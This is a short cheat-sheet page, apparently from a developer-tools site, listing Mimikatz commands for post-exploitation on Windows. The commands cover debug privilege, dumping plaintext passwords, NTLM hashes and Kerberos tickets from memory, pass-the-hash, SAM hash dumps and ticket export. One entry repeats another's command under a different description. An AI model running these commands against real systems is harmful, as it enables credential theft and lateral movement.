logo
Free, unlimited AI code reviews that run on commit
git-lrc git-lrc GitHub Install Now We'd appreciate a star git-lrc - Free, unlimited AI code reviews that run on commit | Product Hunt git-lrc - Free, unlimited AI code reviews that run on commit | Product Hunt

Mimikatz - Extract Windows Credentials | Online Free DevTools by Hexmos

Extract Windows credentials with Mimikatz, a powerful post-exploitation tool. Dump passwords, hashes, and Kerberos tickets. Free online tool, no registration required.

mimikatz

Interact with Windows credentials, perform credential dumping, token manipulation, and more. Requires administrator privileges and typically runs on Windows. More information: https://github.com/gentilkiwi/mimikatz.

  • Run mimikatz in interactive mode:

mimikatz

  • Enable debug privileges (needed for most operations):

mimikatz "privilege::debug"

  • List available logon sessions:

mimikatz "sekurlsa::logonpasswords"

  • Dump plaintext passwords, NTLM hashes, and Kerberos tickets from memory:

mimikatz "sekurlsa::logonpasswords"

  • Pass-the-Hash with a specific NTLM hash and launch a command:

mimikatz "sekurlsa::pth /user:{{username}} /domain:{{domain}} /ntlm:{{hash}} /run:{{cmd}}"

  • Dump local SAM database hashes:

mimikatz "lsadump::sam"

  • Extract Kerberos tickets and export to a file:

mimikatz "kerberos::list /export"

  • Exit mimikatz:

exit